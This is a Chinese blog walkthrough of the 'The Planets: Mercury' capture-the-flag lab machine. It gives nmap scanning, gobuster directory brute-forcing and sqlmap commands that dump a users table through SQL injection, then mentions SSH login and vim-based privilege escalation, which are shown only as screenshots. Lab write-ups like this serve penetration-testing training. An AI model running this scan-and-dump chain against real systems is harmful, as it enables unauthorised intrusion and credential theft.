THE PLANETS MERCURY

最新推荐文章于 2024-05-23 14:59:34 发布
最新推荐文章于 2024-05-23 14:59:34 发布
阅读量30 收藏
点赞数
分类专栏: 红队笔记专栏 文章标签: Linux linux 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_61427044/article/details/131498954
版权

靶机精讲 之 THE PLANETS MERCURY

# C段
sudo nmap -sn 192.168.28.0/24 

# 端口扫描
sudo nmap -sT --min-rate 10000 -p- 192.168.28.32 -oA nmapscan/ports

# 详细信息扫描
sudo nmap -sT -sV -sC -O -p22,8080 192.168.28.32 -oA nmapscan/detail

# UDP
sudo nmap -sU --min-rate 10000 -p- 192.168.28.32 -oA nmapscan/udp
sudo nmap -sU --top-ports 20 192.168.28.32 -oA nmapscan/udp

# 漏洞扫描
sudo nmap --script=vuln -p22,8080 192.168.28.32

端口扫描

image-20230503154017226

详细信息扫描

image-20230503154413827

UDP扫描

image-20230503154551096

  • 192.168.28.32:8080

    image-20230503154634720

漏洞脚本扫描

image-20230503155133239

目录爆破

sudo gobuster dir -u http://192.168.28.32:8080 -w /usr/share/dirbuster/wordlist/directory-list-2.3-medium.txt

SQL注入

  • sudo sqlmap -u http://192.168.28.32:8080/mercuryfacts/1 --dbms mysql --dbs

    image-20230503155320767image-20230503155344726

  • sudo sqlmap -u http://192.168.28.32:8080/mercuryfacts/1 --dbms mysql -D mercury -tables --batch

    image-20230503155624903

  • sudo sqlmap -u http://192.168.28.32:8080/mercuryfacts/1 --dbms mysql -D mercury -T users --dump --batch

    image-20230503155957999

ssh 连接

image-20230503160059886

提权的操作

image-20230503160146159

image-20230503160326446

image-20230503160656919

  • vim的提权

    image-20230503160729849

image-20230503160803815

辉小鱼~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
The Planets Digital Preservation Suite-开源
05-13
Planets是一项由欧盟委员会共同资助的为期四年的项目,旨在应对核心数字保存挑战。 该项目开发了一套工具和服务,以长期支持数字内容的保存和访问。
poj 3174 Alignment of the Planets.md
11-17
poj 3174 Alignment of the Planets.md
Planets Earth Mars and the Moon 0.4.4
08-07
有能力请支持正版! 有能力请支持正版! 有能力请支持正版! 有能力请支持正版! 有能力请支持正版! 有能力请支持正版! 有能力请支持正版! 有能力请支持正版! 有能力请支持正版! 有能力请支持正版!...
Planets Earth, Mars and the Moon
12-04
该包提供了这些逼真的行星:地球,火星和月球。五百多mb,高清 Features: - Works on Unity 5 and Unity 4. ( 2 versions ) - Unity 5 only : 16K textured planet Earth ! - Ready-to-use prefabs that can be ...
8planets.app:8Planets应用程序的网站
03-10
要求安装$ git clone https://github.com/pixyzehn/8planets.app.git$ cd 8planets.app/$ bundle install建造$ bundle exec jekyll build预览$ bundle exec jekyll serve执照代码是在下开源的。 内容是根据。
Linux 三十六章
一怀明月的博客
05-17 1194
信号量 sem_init sem_destroy sem_wait sem_post 基于环形队列的CP问题 环形队列的生产者消费者模型 线程池 localtime时间戳转化 mkdir系统调用 bind绑定成员函数 懒汉饿汉单例模式 懒汉模式: 饿汉模式: 懒汉和饿汉相同点: 线程池源码实现
Linux “如何添加用户/组和修改用户/组”
y2162484776的博客
05-20 527
我们首先要知道Linux中用户时必须的吗!???用户是标识计算机的资源归属的。
linuxlinux中免交互命令expect原理与应用实战
景天科技苑
05-20 3398
Expect 是基于 Tcl 的相对简单的一个免费的脚本编程工具语言,用来实现 自动和交互式任务程序进行通信,无需人的手工干预。比如 SSH、FTP 等,这些 程序正常情况都需要手工与它们进行交互,而使用 Expect 就可以模拟人手工交 互的过程,实现自动的和远程的程序交互,从而达到自动化运维的目的。
Linux——进程信号
m0_75186846的博客
05-19 1036
介绍了Linux信号的产生、保存与处理
Linux网络管理命令之ss
hhd1988的专栏
05-17 828
Linux网络管理命令之ss
linux基于LD_PRELOAD机制的内存泄露检测工具
Hi20240217的博客
05-17 755
Valgrind影响性能且某些程序会报错,同时我们希望跳过初始化阶段,在程序稳定运行之后再去检测内存是否会持续增涨,为了更高效的记录内存分配情况,采用b+树.该程序会拦截malloc,free,calloc,realloc,new,delete。记录10层的PC指针,方便解析脚本定位调用的代码位置.
Linux】-Zookeeper安装部署[17]
weixin_63106307的博客
05-20 487
除了为Hadoop和Hbase提供协调服务外,ZooKeeper也被其他软件采用作为其分布式状态一致性的依赖,比如Kafka,又或者一些软件项目中,也经常能见到ZooKeeper作为一致性协调服务存在。10、【在node1、node2、node3上分别执行】启动zookeeper。11、【在node1、node2、node3上分别执行】检查zookeeper。7、【node1上操作】 将zookeeper 复制到node2和node3。2、【node1上操作】下载ZooKeeper安装包,并解压。
Linux】:进程状态
Yikefore的博客
05-18 830
操作系统层面的进程状态与Linux中具体的进程状态详细介绍!
linux】深入了解线程池:基本概念与代码实例(C++)
最新发布
卜及中的博客
05-23 488
线程池是一种并发编程的解决方案(线程使用模式),它由一组工作线程和一个任务队列组成。工作线程在初始化时被创建并持续运行,等待从任务队列中获取任务并执行。当任务执行完成后,线程不会退出,而是继续保持运行状态,等待下一个任务的到来。线程池不仅能够保证内核的充分利用,还能防止过分调度。
Linux】进程,查看硬件信息,定时任务,查看文件信息
yannan20190313的博客
05-20 595
Linux】进程,查看硬件信息(cpu,内存,块设备,磁盘,分区),定时任务(日期,时间同步,crontab,anacrontab),查看文件信息(ll,file,stat,文件类型,/proc目录)
Linux中“用户管理”
NanandV1的博客
05-20 915
三、Linux的文件属性。
K8S认证|CKA题库+答案| 5. 创建 Ingress
Dances with Cloud Native
05-18 1193
K8S认证 | CKA题库 + 答案 | 5 . 创建 Ingress
23-LINUX--TCP连接状态
weixin_67854013的博客
05-21 949
23-LINUX--TCP连接状态
linux 中 fd 申请和释放管理(两级 bitmap)
weixin_38184628的博客
05-20 709
通过上边的文章,我们可以知道,在 linux 中,fd 有以下几点需要了解:(1)fd 表示进程打开的文件,是进程级别的资源,不是系统级别的资源(2)struct task_struct 在内核中用于描述一个进程,其中打开的文件使用 fd table 来描述(3)在用户态看 linux,一些皆文件(4)一个进程可以打开的文件个数是有限制的,使用 ulimit -a 可以查看可以想象,如果让我们自己来实现的话,我们会选择一个 bitmap 来维护 fd 的被使用情况。
the planets: earth靶机
04-11
问题:关于行星:地球和静机。 回答:这个问题似乎出现了编码问题,其中“Earth静机”不是一个有意义的词语,因此无法给出明确的回答。如果问题中的“静机”是指其他行星,可以尝试使用正确的编码再次提交问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值